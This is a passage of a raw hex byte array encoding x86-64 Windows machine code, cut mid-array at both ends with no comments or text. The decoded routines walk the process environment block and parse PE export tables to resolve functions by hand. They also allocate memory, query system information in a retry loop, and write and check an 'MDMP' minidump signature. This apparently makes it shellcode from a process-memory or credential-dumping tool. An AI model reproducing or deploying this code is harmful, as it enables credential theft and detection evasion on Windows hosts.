8,0x8B,0x45,0xF8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xDD,0x93,0x00,0x00,0x48,0x8B,0x05,0xCE,0x35,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xCE,0x35,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x83,0x6D,0xF0,0x01,0x83,0x7D,0xF0,0x00,0x79,0x87,0xEB,0x01,0x90,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x55,0x10,0x48,0x8D,0x45,0xF0,0xC7,0x44,0x24,0x28,0x04,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x00,0x10,0x00,0x00,0x49,0x89,0xD1,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC2,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xE8,0xC4,0x4B,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xF0,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x90,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0x85,0xC0,0x74,0x4B,0x48,0x8B,0x45,0x18,0x48,0x85,0xC0,0x74,0x42,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xFA,0x92,0x00,0x00,0x48,0xC7,0x45,0x18,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0x18,0x41,0xB9,0x00,0x80,0x00,0x00,0x49,0x89,0xC0,0x48,0x8D,0x55,0x10,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xE8,0x93,0x4B,0x00,0x00,0x89,0x45,0xFC,0xEB,0x01,0x90,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0x48,0x8D,0x45,0xF8,0x48,0x89,0xC1,0xE8,0xD1,0xEE,0xFF,0xFF,0x89,0xC1,0xE8,0xBA,0x92,0x00,0x00,0x48,0x8B,0x45,0x10,0xC7,0x00,0x4D,0x44,0x4D,0x50,0x48,0x8B,0x45,0x18,0x66,0xC7,0x00,0x93,0xA7,0x48,0x8B,0x45,0x20,0x66,0xC7,0x00,0x00,0x00,0xE9,0xEF,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0xC7,0x00,0x00,0x00,0x00,0x00,0xE8,0x7A,0x92,0x00,0x00,0xC1,0xE0,0x11,0x89,0xC2,0x48,0x8B,0x45,0x10,0x8B,0x00,0x09,0xC2,0x48,0x8B,0x45,0x10,0x89,0x10,0xE8,0x62,0x92,0x00,0x00,0xC1,0xE0,0x02,0x25,0xFC,0xFF,0x01,0x00,0x89,0xC2,0x48,0x8B,0x45,0x10,0x8B,0x00,0x09,0xC2,0x48,0x8B,0x45,0x10,0x89,0x10,0xE8,0x45,0x92,0x00,0x00,0x83,0xE0,0x03,0x89,0xC2,0x48,0x8B,0x45,0x10,0x8B,0x00,0x09,0xC2,0x48,0x8B,0x45,0x10,0x89,0x10,0x48,0x8B,0x45,0x18,0x66,0xC7,0x00,0x00,0x00,0xE8,0x24,0x92,0x00,0x00,0xC1,0xE0,0x08,0x25,0x00,0xFF,0x00,0x00,0x89,0xC2,0x48,0x8B,0x45,0x18,0x0F,0xB7,0x00,0x89,0xC1,0x89,0xD0,0x09,0xC8,0x89,0xC2,0x48,0x8B,0x45,0x18,0x66,0x89,0x10,0xE8,0xFF,0x91,0x00,0x00,0x0F,0xB6,0xD0,0x48,0x8B,0x45,0x18,0x0F,0xB7,0x00,0x89,0xC1,0x89,0xD0,0x09,0xC8,0x89,0xC2,0x48,0x8B,0x45,0x18,0x66,0x89,0x10,0x48,0x8B,0x45,0x20,0x66,0xC7,0x00,0x00,0x00,0xE8,0xD8,0x91,0x00,0x00,0xC1,0xE0,0x08,0x25,0x00,0xFF,0x00,0x00,0x89,0xC2,0x48,0x8B,0x45,0x20,0x0F,0xB7,0x00,0x89,0xC1,0x89,0xD0,0x09,0xC8,0x89,0xC2,0x48,0x8B,0x45,0x20,0x66,0x89,0x10,0xE8,0xB3,0x91,0x00,0x00,0x0F,0xB6,0xD0,0x48,0x8B,0x45,0x20,0x0F,0xB7,0x00,0x89,0xC1,0x89,0xD0,0x09,0xC8,0x89,0xC2,0x48,0x8B,0x45,0x20,0x66,0x89,0x10,0x48,0x8B,0x45,0x10,0x8B,0x00,0x3D,0x4D,0x44,0x4D,0x50,0x0F,0x84,0x00,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x18,0x0F,0xB7,0x00,0x66,0x3D,0x93,0xA7,0x0F,0x84,0xEF,0xFE,0xFF,0xFF,0x48,0x8B,0x45,0x20,0x0F,0xB7,0x00,0x66,0x85,0xC0,0x0F,0x84,0xDF,0xFE,0xFF,0xFF,0x90,0x90,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x8B,0x45,0x10,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x5A,0x4C,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x48,0x89,0x4D,0x20,0x89,0x55,0x28,0x44,0x89,0x45,0x30,0x83,0x7D,0x28,0x00,0x75,0x52,0x48,0x8B,0x45,0x20,0xBA,0x5C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x2D,0x91,0x00,0x00,0x48,0x85,0xC0,0x74,0x17,0x48,0x8B,0x45,0x20,0xBA,0x5C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x17,0x91,0x00,0x00,0x48,0x83,0xC0,0x01,0xEB,0x04,0x48,0x8B,0x45,0x20,0x48,0x89,0xC2,0x48,0x8D,0x05,0xB3,0xB4,0x00,0x00,0x48,0x89,0xC1,0xE8,0x53,0xE7,0xFF,0xFF,0x48,0x8D,0x05,0x1B,0xB4,0x00,0x00,0x48,0x89,0xC1,0xE8,0x44,0xE7,0xFF,0xFF,0x83,0x7D,0x30,0x00,0x0F,0x84,0x88,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0xBA,0x5C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD1,0x90,0x00,0x00,0x48,0x85,0xC0,0x74,0x17,0x48,0x8B,0x45,0x20,0xBA,0x5C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xBB,0x90,0x00,0x00,0x48,0x8D,0x58,0x01,0xEB,0x04,0x48,0x8B,0x5D,0x20,0x48,0x8B,0x45,0x20,0xBA,0x5C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xA0,0x90,0x00,0x00,0x48,0x85,0xC0,0x74,0x17,0x48,0x8B,0x45,0x20,0xBA,0x5C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x8A,0x90,0x00,0x00,0x48,0x83,0xC0,0x01,0xEB,0x04,0x48,0x8B,0x45,0x20,0x49,0x89,0xD8,0x48,0x89,0xC2,0x48,0x8D,0x05,0x7B,0xB4,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC3,0xE6,0xFF,0xFF,0x48,0x8D,0x05,0x8B,0xB3,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB4,0xE6,0xFF,0xFF,0xEB,0x2C,0x48,0x8B,0x55,0x20,0x48,0x8B,0x45,0x20,0x49,0x89,0xD0,0x48,0x89,0xC2,0x48,0x8D,0x05,0x4D,0xB4,0x00,0x00,0x48,0x89,0xC1,0xE8,0x95,0xE6,0xFF,0xFF,0x48,0x8D,0x05,0x5D,0xB3,0x00,0x00,0x48,0x89,0xC1,0xE8,0x86,0xE6,0xFF,0xFF,0x90,0x48,0x83,0xC4,0x28,0x5B,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0xC7,0x45,0xE8,0x00,0x02,0x00,0x00,0x8B,0x45,0xE8,0x89,0x45,0xFC,0x8B,0x45,0xE8,0x89,0x45,0xFC,0x8B,0x45,0xE8,0x89,0xC3,0x48,0x8B,0x05,0xA8,0x31,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xA4,0x31,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xA5,0x00,0x00,0x00,0x44,0x8B,0x45,0xE8,0x48,0x8B,0x4D,0xF0,0x48,0x8B,0x45,0x20,0x48,0x8D,0x55,0xE8,0x48,0x89,0x54,0x24,0x20,0x45,0x89,0xC1,0x49,0x89,0xC8,0xBA,0x1B,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xBC,0x46,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x78,0x1B,0x48,0x8B,0x45,0x28,0x48,0x8B,0x55,0xF0,0x48,0x89,0x10,0x8B,0x55,0xE8,0x48,0x8B,0x45,0x30,0x89,0x10,0xB8,0x01,0x00,0x00,0x00,0xEB,0x59,0x48,0x83,0x7D,0xF0,0x00,0x74,0x40,0x8B,0x55,0xFC,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x1B,0x8F,0x00,0x00,0x48,0x8B,0x05,0x0C,0x31,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x0C,0x31,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x81,0x7D,0xEC,0x04,0x00,0x00,0xC0,0x0F,0x84,0x23,0xFF,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x58,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0x48,0x89,0x4D,0x10,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xC0,0x8B,0x55,0xFC,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x30,0x00,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xF8,0x45,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xE0,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0x48,0x89,0x4D,0x10,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xC0,0x8B,0x55,0xFC,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x30,0x00,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x0E,0x55,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xD8,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x48,0x48,0x8D,0x6C,0x24,0x40,0x48,0x89,0x4D,0x20,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xEC,0x48,0x8D,0x55,0xF0,0x48,0x8B,0x45,0x20,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xFB,0xFD,0xFF,0xFF,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x1F,0x01,0x00,0x00,0x48,0x8B,0x45,0xF0,0x0F,0xB7,0x00,0x66,0x85,0xC0,0x75,0x55,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x74,0x42,0x8B,0x45,0xEC,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xA0,0x8D,0x00,0x00,0x48,0x8B,0x5D,0xF0,0x48,0x8B,0x05,0x8D,0x2F,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x91,0x2F,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0xBE,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x8B,0x40,0x08,0x48,0x8D,0x15,0x32,0xB2,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC6,0x8D,0x00,0x00,0x48,0x85,0xC0,0x74,0x52,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x74,0x42,0x8B,0x45,0xEC,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x2F,0x8D,0x00,0x00,0x48,0x8B,0x5D,0xF0,0x48,0x8B,0x05,0x1C,0x2F,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x20,0x2F,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0xEB,0x50,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x74,0x42,0x8B,0x45,0xEC,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xDD,0x8C,0x00,0x00,0x48,0x8B,0x5D,0xF0,0x48,0x8B,0x05,0xCA,0x2E,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xCE,0x2E,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x48,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x83,0x7D,0x10,0x00,0x75,0x0E,0x48,0x83,0x7D,0x18,0x00,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x59,0x83,0x7D,0x10,0x00,0x74,0x2D,0x8B,0x45,0x10,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x89,0xC1,0xE8,0xDF,0x14,0x00,0x00,0x48,0x89,0x45,0x18,0x48,0x83,0x7D,0x18,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x26,0x48,0x8B,0x45,0x18,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x14,0x48,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0xBA,0x00,0x00,0x00,0x00,0xB9,0x00,0x10,0x00,0x00,0xE8,0xFA,0x13,0x00,0x00,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x26,0x48,0x8B,0x45,0xF8,0x48,0x89,0xC1,0xE8,0x18,0xFD,0xFF,0xFF,0x89,0x45,0xF4,0x48,0x8B,0x45,0xF8,0x48,0x89,0xC1,0xE8,0x90,0x42,0x00,0x00,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0xC7,0x45,0xDC,0x60,0x00,0x00,0x00,0x8B,0x45,0xDC,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xD0,0x48,0x8B,0x45,0xD0,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x48,0x8B,0x40,0x18,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x48,0x83,0xC0,0x10,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x40,0x10,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x39,0xD0,0x72,0x2A,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x40,0x89,0xC0,0x48,0x01,0xD0,0x48,0x8B,0x55,0x10,0x48,0x39,0xC2,0x73,0x0A,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0xEB,0x1A,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x3B,0x45,0xE0,0x75,0xAD,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0x48,0x89,0x4D,0x10,0x48,0x83,0x7D,0x10,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x6A,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x0F,0xB7,0x00,0x66,0x3D,0x4D,0x5A,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x4E,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x3C,0x48,0x63,0xD0,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x3D,0x50,0x45,0x00,0x00,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x25,0x48,0x8B,0x45,0xF0,0x0F,0xB7,0x40,0x16,0x66,0x89,0x45,0xEE,0x0F,0xB7,0x45,0xEE,0x25,0x00,0x20,0x00,0x00,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x60,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0xC7,0x45,0xD4,0x60,0x00,0x00,0x00,0x8B,0x45,0xD4,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xC8,0x48,0x8B,0x45,0xC8,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x48,0x8B,0x40,0x18,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x48,0x83,0xC0,0x10,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x40,0x10,0x48,0x89,0x45,0xF8,0xEB,0x47,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0x48,0x39,0x45,0x10,0x74,0x2A,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0x8B,0x55,0x18,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xAE,0x01,0x00,0x00,0x48,0x89,0x45,0xD8,0x48,0x83,0x7D,0xD8,0x00,0x74,0x09,0x48,0x8B,0x45,0xD8,0xEB,0x1E,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x3B,0x45,0xE0,0x75,0xAF,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x60,0x5D,0xC3,0x55,0x57,0x48,0x81,0xEC,0x68,0x03,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x00,0x03,0x00,0x00,0x48,0x89,0x95,0x08,0x03,0x00,0x00,0x48,0x8B,0x85,0x08,0x03,0x00,0x00,0xBA,0x2E,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF8,0x89,0x00,0x00,0x48,0x83,0xC0,0x01,0x48,0x89,0x85,0xD8,0x02,0x00,0x00,0x48,0x8B,0x95,0xD8,0x02,0x00,0x00,0x48,0x8B,0x85,0x08,0x03,0x00,0x00,0x48,0x29,0xC2,0x89,0x95,0xD4,0x02,0x00,0x00,0x48,0x8D,0x95,0xB0,0x01,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xB9,0x20,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0x89,0xFA,0x89,0x02,0x48,0x83,0xC2,0x04,0x88,0x02,0x48,0x83,0xC2,0x01,0x8B,0x8D,0xD4,0x02,0x00,0x00,0x48,0x8B,0x95,0x08,0x03,0x00,0x00,0x48,0x8D,0x85,0xB0,0x01,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x89,0x89,0x00,0x00,0x48,0x8D,0x85,0xB0,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x6A,0x89,0x00,0x00,0x48,0x89,0xC2,0x48,0x8D,0x85,0xB0,0x01,0x00,0x00,0x48,0x01,0xD0,0xC7,0x00,0x64,0x6C,0x6C,0x00,0x48,0x8D,0x55,0xA0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x41,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0x8D,0x95,0xB0,0x01,0x00,0x00,0x48,0x8D,0x45,0xA0,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0xEA,0x88,0x00,0x00,0x48,0x8D,0x45,0xA0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x5E,0x02,0x00,0x00,0x48,0x89,0x85,0xC8,0x02,0x00,0x00,0x48,0x83,0xBD,0xC8,0x02,0x00,0x00,0x00,0x75,0x30,0x48,0x8B,0x85,0xD8,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF5,0x38,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0x00,0x03,0x00,0x00,0x48,0x89,0xC1,0xE8,0x2A,0xFE,0xFF,0xFF,0x48,0x89,0x85,0xC0,0x02,0x00,0x00,0x48,0x8B,0x85,0xC0,0x02,0x00,0x00,0xEB,0x34,0x48,0x8B,0x85,0xD8,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC5,0x38,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0xC8,0x02,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x18,0x00,0x00,0x00,0x48,0x89,0x85,0xC0,0x02,0x00,0x00,0x48,0x8B,0x85,0xC0,0x02,0x00,0x00,0x48,0x81,0xC4,0x68,0x03,0x00,0x00,0x5F,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xC4,0x80,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0xC0,0x66,0x89,0x45,0x20,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x30,0xFD,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xA9,0x01,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x8B,0x40,0x3C,0x48,0x63,0xD0,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x48,0x05,0x88,0x00,0x00,0x00,0x48,0x89,0x45,0xD8,0x48,0x8B,0x45,0xD8,0x8B,0x40,0x04,0x85,0xC0,0x74,0x0A,0x48,0x8B,0x45,0xD8,0x8B,0x00,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x5F,0x01,0x00,0x00,0x48,0x8B,0x45,0xD8,0x8B,0x00,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xD0,0x48,0x8B,0x45,0xD8,0x8B,0x40,0x04,0x89,0x45,0xCC,0x48,0x8B,0x45,0xD0,0x8B,0x40,0x1C,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xC0,0x48,0x8B,0x45,0xD0,0x8B,0x40,0x20,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xB8,0x48,0x8B,0x45,0xD0,0x8B,0x40,0x24,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xB0,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x83,0x7D,0x18,0x00,0x0F,0x84,0x81,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xEB,0x6A,0x8B,0x45,0xF4,0x48,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xB8,0x48,0x01,0xD0,0x8B,0x00,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xA8,0x48,0x8B,0x45,0xA8,0x48,0x89,0xC1,0xE8,0x7B,0x37,0x00,0x00,0x39,0x45,0x18,0x75,0x34,0x8B,0x45,0xF4,0x48,0x8D,0x14,0x00,0x48,0x8B,0x45,0xB0,0x48,0x01,0xD0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x48,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xC0,0x48,0x01,0xD0,0x8B,0x00,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xF8,0xEB,0x3F,0x83,0x45,0xF4,0x01,0x48,0x8B,0x45,0xD0,0x8B,0x40,0x18,0x39,0x45,0xF4,0x72,0x8A,0xEB,0x2D,0x0F,0xB7,0x55,0x20,0x48,0x8B,0x45,0xD0,0x8B,0x40,0x10,0x29,0xC2,0x89,0xD0,0x48,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xC0,0x48,0x01,0xD0,0x8B,0x00,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x38,0x48,0x8B,0x55,0xF8,0x48,0x8B,0x45,0xD0,0x48,0x39,0xC2,0x72,0x27,0x8B,0x55,0xCC,0x48,0x8B,0x45,0xD0,0x48,0x01,0xD0,0x48,0x8B,0x55,0xF8,0x48,0x39,0xC2,0x73,0x14,0x48,0x8B,0x55,0xF8,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xB6,0xFC,0xFF,0xFF,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x83,0xEC,0x80,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xC4,0x80,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0xC7,0x45,0xC8,0x60,0x00,0x00,0x00,0x8B,0x45,0xC8,0x